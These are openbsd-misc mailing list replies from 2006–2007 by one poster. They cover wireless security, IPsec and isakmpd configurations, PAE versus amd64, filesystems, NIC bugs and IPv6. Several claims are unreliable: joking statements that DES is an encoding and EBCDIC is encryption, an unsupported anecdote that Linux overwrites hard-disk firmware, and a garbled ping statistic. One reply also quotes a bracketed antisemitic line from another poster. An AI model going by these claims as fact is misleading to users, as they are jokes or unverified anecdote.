Re: OpenBSD in the webcomic XKCD
Salut, On Mon, Nov 26, 2007 at 04:49:20PM +0100, David Vasek wrote: The Lynx displays only 'alt', not 'title', texts. Old Netscape Navigators That behavior is actually correct since title= is for annotations to the image while alt= is for the case when the image cannot at all be displayed. (I'm sure that's not really OpenBSD related though.) Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: securing OpenBSD wireless network
Salut, On Mon, Nov 19, 2007 at 07:59:17AM -0800, David Newman wrote: OpenBSD supports WEP. Does it even matter? Well, if you want to prevent someone from accidentally connecting to your network, yes. WEP keys can be captured is less than one minute: http://eprint.iacr.org/2007/120.pdf http://tapir.cs.ucl.ac.uk/bittau-wep.pdf WEP is certainly better than nothing if all you have is older hardware that doesn't support WPA/WPA2, but that's about all. If your APs and host adapters support WPA, use it, not WEP. Think of WEP as an encoding. Just like all the others: ASCII, UTF-8, DES[1], MD5, etc. They do not provide any security, as opposed to encryption algorithms, such as AES, Twofish, EBCDIC, et cetera. ;-) Personally, I use IPsec to secure my WLAN, and I can only recommend that to others. It is very effective. Tonnerre [1]: It's called Data Encoding Standard, after all ;-) [demime 1.01d removed an attachment of type application/pgp-signature]
Re: securing OpenBSD wireless network
Salut, On Mon, Nov 19, 2007 at 02:20:54PM -0800, David Newman wrote: There is some layer-2 stuff that happens before layer-3 handshaking begins -- 802.11 association and deassociation, possibly layer-2 learning, and 802.1X authentication if that's used. IPSec will not and cannot secure any of this. Is there any need to secure that? In my local WLAN, you only have two ways of proceeding if you want internet access: a Tor router, or IPsec. If you come in without IPsec, i.e. you cannot establish the IKE handshake, and if you don't us the Socks proxy Tor provides, you are trapped in a local network where noone except all of the laptops are. Sure thing, you can communicate with another unauthenticated laptop, but I don't care that much about this scenario, since it does not cause me any problems. Wireless LANs are a technology in which sensitive data may go in the clear at L2 before L3 gets started. In this case L2 security mechanisms such as WPA are appropriate, and do not rule out the use of complementary mechanisms like IPSec or SSL. What sensitive data do you see me exchange before IPsec connectivity is established? Even if you don't care about authenticating or encrypting L2 data, there's still the issue of bandwidth and resource consumption at L2. 802.11 is extremely chatty. Using WPA or (if you must) WEP to keep the airwaves free (well, to the extent possible) can help there. With a, that's not that much of a problem usually Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: linux kills laptop hard drive... how does obsd behave?
Salut, On Sat, Oct 27, 2007 at 11:34:27AM +0200, Adliger Martinez von der Unterschicht wrote: Now, a friend of mine has found a big problem: http://www.linux-hero.com/rant/explanation-ubuntu-hard-drive-wear-and-tear https://bugs.launchpad.net/ubuntu/+bug/59695 https://bugs.launchpad.net/ubuntu/+bug/104535 Actually, Linux has a far worse bug in terms of hard disks, which has been introduced in kernel version 1.3.26 or something in that order. Under some circumstances, it overwrites the hard disk's firmware. Mostly this happens in a state where the OS can't really function too well anymore anyway, so you can only reboot. However, a hard disk with a bogus firmware will behave as a brick, leaving you without a chance to fix the situation. I have a couple of hard disks here which I use to keep paper from flying away when I write letters, those have been Linux'd. It happens rarely, but it does happen. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: linux kills laptop hard drive... how does obsd behave?
Salut, On Sat, Oct 27, 2007 at 12:14:49PM -0500, bofh wrote: I'm really curious, I've never heard of a HD firmware killing bug in linux since 1.3.x. I used to spend a lot of time following linux in the 1.2 1.3 kernel times and don't recall hearing about that bug. Well, that was when I first noticed it. It is a bit hard to track in the mess that Linux is, but it still exists in the 2.6 series: a 2.6.20 kernel Linux'd yet another hard disk of mine a couple of weeks ago. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: linux kills laptop hard drive... how does obsd behave?
Salut, On Sat, Oct 27, 2007 at 12:38:55PM -0500, Todd Alan Smith wrote: What exactly were the symptoms of your drive being linux'd? It tries to imitate a brick as closely as possible. Also, I'm wondering if this discussion shouldn't be taken off-list, since it's really about Linux, not OpenBSD. Well, the entire thread was started as Linux killing hard disks, wasn't it? Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Google employment opportunity
Salut, On Sun, Oct 14, 2007 at 08:47:45AM +0100, Craig Skinner wrote: [I hate jews] Could someone please enlighten me how this is OpenBSD related? Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Get developers some big machines to support more RAM
Salut, On Mon, Oct 08, 2007 at 09:44:48AM +, mickey wrote: PAE is slow and has hairy paws. I am glad that we have real amd64 machines now so we don't need it anymore. besides that what do you think amd64 runs? (: it uses the same pae as i386. and it is not any faster. learn what are you talking about... No, it uses 48-bit addresses and some flag bits, but it can use a 64-bit selector rather than two 32-bit ones, improving the performance significantly. Please also note that PAE only has 36-bit addresses, allowing for up to 64GB of RAM, while AMD64 allows for 256TB, theoretically. Well, s/RAM/address space/ Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Get developers some big machines to support more RAM
Salut, On Mon, Oct 08, 2007 at 10:02:22AM +, mickey wrote: or what you think loading 36bit physaddr is slower than loading 48bits? I think that loading 48-bits in one step is faster than loading 36-bit in two. It is also a matter of experience that amd64 memory access is way faster than i386 with PAE. i386 is dying out finally, that's what I meant to say. amd64 has been elected as the architecture of the future by most if not all hardware producers. We got rid of one of the worst pieces of hardware ever, at least partially. This is why I suggested that it might be less of an issue to most people. For a good reason: nowadays, you just get an amd64 and don't have the problem. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Get developers some big machines to support more RAM
Salut, On Mon, Oct 08, 2007 at 11:15:27AM +, mickey wrote: I think that loading 48-bits in one step is faster than loading 36-bit in two. It is also a matter of experience that amd64 memory access is way faster than i386 with PAE. why do you think that tlb loader cannot load 64bits in one step in i386 mode either? I'm talking long mode here. For a good reason: nowadays, you just get an amd64 and don't have the problem. lots of amd64 machines have much of their own stability problems. it is as well a different architecture that requires recompiling software that may or may not be 64bit clean. of course running your favourite irc client would not matter... The software should be migrated, and it is happening. Why BitchX doesn't work on amd64 is not my problem. Also, most software problems can be resolved by compiling the software with something that is not gcc. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: comics and recurring donations Was: Show your appreciation and get your 4.2 DVD
Salut, On Fri, Sep 07, 2007 at 01:17:03PM -0500, Craig Brozefsky wrote: OpenBSD has made me rethink my relationship to alot of projects (open source and political) I am involved with, in a positive way. It made me realize that these projects need funding to get things done and I should contribute what I can myself as opposed to assuming someone else will do it. I think it is a very important aspect to understand that noone will do your work for you in a reasonable timeframe in a project that you will find respectable. Your best chances to get new things in or bugs fixed is to send a PR along with a patch to the developers; but from time to time not even that will do it. Good that you realized it, though. I think that people who did are the force which is driving Open Source. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: filesystems?
Salut, On Tue, Sep 04, 2007 at 01:10:14PM +0200, Eric Elena wrote: No I didn't. Is it so fun? :) Oh yes. By the way, I must say that for additional fun, the directory names were A, B, C, ..., Y, Z. Gives you quite something to search for. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: filesystems?
Salut, On Mon, Sep 03, 2007 at 08:46:37AM +0300, Ihar Hrachyshka wrote: Also you can use ext2(3) filesystem for this purpose: BSD works quite OK with it (though with no journal support), Linux - ow, do you think it's not?:) - and there are some tools in the Internet to be able to read ext2 from Windows. Don't know about writing: you need to investigate it by yourself. The same goes for ffs/ufs Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: filesystems?
Salut, On Mon, Sep 03, 2007 at 05:10:57PM +0200, Eric Elena wrote: I think fat32 is a good choice: you have nothing to install. Did you ever have to debug a deep directory structure where something caused all directory to become files? On a 500G disk? Fun. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: That whole Linux stealing our code thing
Salut, On Sun, Sep 02, 2007 at 12:42:14PM +0100, Rui Miguel Silva Seabra wrote: Likewise, if you don't like the GPL, don't let it be a choice for other users. If your problem is that people don't give back, go knock on certain vendors who profit from OpenSSH without contributin anything back. Oh wait... they don't have to, have they? :) They wouldn't, even if we asked them to. They would do it once and switch to some incompatible Cisco SSH which only works with PuTTY. The goal we have reached with everyone using OpenSSH is that they are actually interoperable with the rest of the SSH world. You cannot convince vendors to be more open by forcing them in the way the GPL people do; this will only drive them into the hands of the other commercial providers. Nothing has boosted the spread of VxWorks like the GPL violations project. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: bge0: watchdog timeout
Salut, On Wed, Aug 29, 2007 at 02:23:04PM -0700, Tom Bombadil wrote: So, basically all we can do is just avoid the 5704s, right? Well, I can't tell you for 100% if it is that bug or a simple driver problems. It's just the symptoms which I know very well from prior experiences with 5704/5705 based cards. (And the acknowledgement of the bug from Broadcom.) Another question then... The new HP hardware we are getting comes with embedded BCM5708s (bnx). Does, this NIC have any problem we should know about? Well, the jamming DMA controller is a 5704/5705 specific problem as far as I know. I am running on a BCM5753M, and everything is working well. We also have BCM5721 which is running well and BCM5705_2 which is crappy as hell. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Is Theo still hiking ????
Salut, On Mon, Jan 29, 2007 at 10:45:08AM +0100, Claudio Jeker wrote: Note: the OpenBSD routing table does not do that. It's hard to do hardware accelerated FIBs without the hardware, isn't it? While IPv6 has a static header size it uses header stacking and so every router has to do the same stupid header parsing that needs tons of special logic. If you need to look at them at all, that is. For simple end-to-end routing, this is not required. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Is Theo still hiking ????
Salut, On Sun, Jan 28, 2007 at 12:26:11PM +0100, Almir Karic wrote: they said the SAME thing about ipv4 :/ The big problems of IPv4 aren't address space problems but performance problems. There are two big issues: 1. deaggregation. A lot of small nets clog up the pipe which don't have to be announced separately when distributed appropriately. Solution: give every customer as many IPs that he'll never have to come back for more. 2. Routing header parsing. IPv4 uses variable length headers, which involves more overhead than IPv6, who puts extensions into the extension header, so the routing header parsing involves no special logic. 65536 x the total number of possible 48-bit MAC addresses. irrelevant. Not exactly. By default, IPv6 gives you 65535 subnets with 18446744073709551615 possible IPs each. There aren't many companies on this planet who operate more than 65'000 sites (as in factories, buildings, whatever). You don't believe me? Write a small script which pings every IPv4 address on the Internet. The result is: there aren't all that many of them occupied, and there are even entirely vacant class A networks. However, the majority of them are heavily fragmented, which is the real problem. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Friendly registrar
Salut, On Sun, Jan 14, 2007 at 09:55:16PM +0100, Nico Meijer wrote: I like GoDaddy. They're on donations.html. On the other hand, they're known for their Windows business. We chose Gandi for controversial web sites (like ffii.org) because they tend not to shut down the delegation whenever they receive a preliminary injunction. For any kind of Open Source movement, this might become crucial in the future... Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: pkg_add -r -F update
Salut, On Tue, Dec 05, 2006 at 10:13:38AM +0100, Karel Kulhavy wrote: pkg_add transcode-1.0.2p0.tgz says Collision: the following files already exist some with same md5, some with different pkg_add -r update transcode-1.0.2p0.tgz should replace the package acording to the manpage. It doesn't - prints the same error. The manpage further says use -F update to force the replacement When I use pkg_add -r -F update transcode-1.0.2p0.tgz, I get the same errors. Why doesn't pkg_add do what's written in the manpage? Well, it does. There is just no installed package owning the file. You should rather force it to overwrite files, not packages. Which file is it anyway? Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: Bug in ksh // Improvement for tar ?
Salut, On Mon, Dec 04, 2006 at 11:45:46PM -0501, Dan Brosemer wrote: Take a look at the way /etc/rc does stuff like this: [EMAIL PROTECTED]:ttyp1[~]$ if [ x$demo == x-n -o x$demo == x-e ]; then echo bar fi bar Sure, but this is a workaround. It is a bug that ought to be fixed. (Even though it is admittedly a very old bug and a lot of people are using the workaround.) Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: strange behaviour of gre(4) tunnel
Salut, On Wed, Nov 22, 2006 at 08:52:11PM +0500, Igor Goldenberg wrote: 20:28:38.627914 0:4:23:ce:bb:b4 0:16:cb:a2:8e:c5 0800 122: gre 192.50.51.52 192.50.51.28: [] 192.168.254.254 192.168.254.253: icmp: echo request (id:bd53 seq:44) (ttl 255, id 3713, len 84) (DF) (ttl 64, id 26235, len 108) Did you set net.inet.gre.allow to 1? Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: AMD dual core, deciding factors for a platform?
Salut, On Thu, Nov 16, 2006 at 05:38:58PM +0200, turha turha wrote: I'm about to build a new box, and thought I'd ask first if there's any experience with AMD's dual core processors (AM2 or s939). From what I've read both socket types work as amd64, with bsd and bsd.mp, right? Any thoughts on which works more stable and faster, i386 vs amd64 arch, and the benefits of using bsd.mp? What chipsets/MoBos work well? So mainly I'm interested in comments from people who have tested these, to see if it's worth the trouble (money) to get dual core for openbsd, is there much of an improvement, etc. I tried 3.9 on a Sun Fire X2100 with a dual core Opteron 146 a while ago, but OpenBSD only worked every other boot. On some boots, it would just crash and on the next boot it would do a fsck and then crash and one more reboot later, it would come up with a corrupt boot sector. :/ Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
More IPsec configuration problems
Salut, I have another problem with IPsec (using isakmpd). I used almost the example config, but depending on the target, I get packet loss in different amounts: * 10.16.1.131 to 10.1.2.9, for example, always stalls when trying to fetch web sites via https * 10.16.1.131 to 10.1.4.111 works well though, however, SSH connections tend to stand still after a couple of minutes, and get reset * 10.16.1.131 to 10.1.2.4 gives me sudden hangs when creating a lot of traffic Any idea what setting might cause this? When pinging through the VPN, I get the following statistics: 1 packets transmitted, 9967 packets received, 0% packet loss round-trip min/avg/max/stddev = 20.135/24.896/176.564/11.385 ms This doesn't seem very lossy, but it is actually enough to let some TCP connections stall, it seems. Looking at the logs, I used to see the following in pre-4.0 OpenBSD versions: Nov 13 14:53:46 rtsyg01 isakmpd[1447]: message_recv: invalid cookie(s) 5ca7897d133e5c6e 5edcdaaa3ed541a9 Nov 13 14:53:46 rtsyg01 isakmpd[1447]: dropped message from 213.189.149.229 port 500 due to notification type INVALID_COOKIE But it seems that these messages disappeared as well. Now, there is no note in the logs to why the packet loss occurrs at all. Ideas? Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: More IPsec configuration problems
Salut, Config: see http://marc.theaimsgroup.com/?l=openbsd-miscm=116336496801052 Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
OpenBSD isakmpd connectivity problem (or misunderstanding?)
Salut, I have a problem with direct connection of two servers using IPsec. The IKE key exchange always comes up, but then it seems that both the routing and the encryption go entirely wrong. The host exchange their internal addresses (10.16.1.1 and 10.1.1.1) as ID tokens for phase 2. However, if I try to ping 10.16.1.1 from 10.1.1.1, the packets go out the external interface - unencrypted. If, however, I replace the ID tokens with the corresponding IP subnets (10.16.0.0/16 and 10.1.0.0/16), I get an even more weird effect: * 10.16.0.0/16 can communicate with 10.1.0.0/16 just fine * 10.1.0.0/16 can communicate with 10.16.0.0/16 just as well * 10.16.1.1 can not reach 10.1.0.0/16, however, people in 10.1.0.0/16 can connect to 10.16.1.1 just fine * 10.1.1.1 can not reach 10.16.0.0/16, however, people in 10.16.0.0/16 can connect to 10.1.1.1 just fine [EMAIL PROTECTED] cat /etc/isakmpd/isakmpd.conf [General] Default-phase-1-lifetime= 120,60:3600 Default-phase-2-lifetime= 120,60:3600 Retransmits= 5 Check-interval= 5 Exchange-max-time= 120 Listen-on= external_ip_address_of_wg Policy-File= /etc/isakmpd/isakmpd.policy [Phase 1] external_ip_address_of_sygroup= ISAKMP-peer-sygroup [Phase 2] Connections= IPsec-wg-sygroup [ISAKMP-peer-sygroup] Phase= 1 Transport= udp Local-address= external_ip_address_of_wg Address=external_ip_address_of_sygroup [IPsec-wg-sygroup] Phase= 2 ISAKMP-peer=ISAKMP-peer-sygroup Configuration= Default-quick-mode Local-ID= Net-wg Remote-ID= Net-sygroup [Net-wg] ID-type=IPV4_ADDR_SUBNET Network=10.16.0.0 Netmask=255.255.0.0 [Net-sygroup] ID-type=IPV4_ADDR_SUBNET Network=10.1.0.0 Netmask=255.255.0.0 # Quick mode description [Default-quick-mode] EXCHANGE_TYPE= QUICK_MODE Suites= QM-ESP-TWOFISH-SHA-PFS-SUITE [EMAIL PROTECTED] cat /etc/isakmpd/isakmpd.conf [General] Default-phase-1-lifetime= 120,60:3600 Default-phase-2-lifetime= 120,60:3600 Retransmits= 5 Check-interval= 5 Exchange-max-time= 120 Listen-on= external_ip_of_sygroup Policy-File= /etc/isakmpd/isakmpd.policy [Phase 1] external_ip_of_wg= ISAKMP-peer-wg [Phase 2] Connections= IPsec-sygroup-wg [ISAKMP-peer-wg] Phase= 1 Transport= udp Local-address= external_ip_of_sygroup Address=external_ip_of_wg [IPsec-sygroup-wg] Phase= 2 ISAKMP-peer=ISAKMP-peer-wg Configuration= Default-quick-mode Local-ID= Net-sygroup Remote-ID= Net-wg [Net-wg] ID-type=IPV4_ADDR_SUBNET Network=10.16.0.0 Netmask=255.255.0.0 [Net-sygroup] ID-type=IPV4_ADDR_SUBNET Network=10.1.0.0 Netmask=255.255.0.0 # Quick mode description [Default-quick-mode] EXCHANGE_TYPE= QUICK_MODE Suites= QM-ESP-BLF-SHA-PFS-SUITE (This is the config where the clients can actually connect to each other. If I replace the Network= with Address= and set ID-type to IPV4_ADDR, the two routers still can't connect to each others, but neither can the clients.) The point of the whole exercise is that I have a lot of IPsec nodes and should propagate their routes using some routing protocol. Any ideas on how to make the two routers talk to each other? Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: OpenBSD isakmpd connectivity problem (or misunderstanding?)
Salut, On Sun, Nov 12, 2006 at 10:24:23PM +0100, Ralph Gessner wrote: You realy do a ping -I 10.1.1.1 10.16.1.1 or only a ping 10.16.1.1? You must have the 10.1.1.1 as source ip. A normal ping on the gateway ueses the external ip as source! Yes, this one works so far. However, how would one configure this statically? Is there any way other than route add -host 10.1.1.1 10.16.1.1 ? Sound like the same problem :) I imagined. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]
Re: openbsd on cisco hardware?
Salut, On Mon, Nov 13, 2006 at 02:04:20PM +1100, Craig Barraclough wrote: Someone correct me if I'm wrong Last time I had a look, the platform was essentially a PII, with fxp NICs and a PCI (or was it ISA?) flash card for the OS. Most Cisco hardware I'm aware of is either MIPS or PowerPC based. Tonnerre [demime 1.01d removed an attachment of type application/pgp-signature]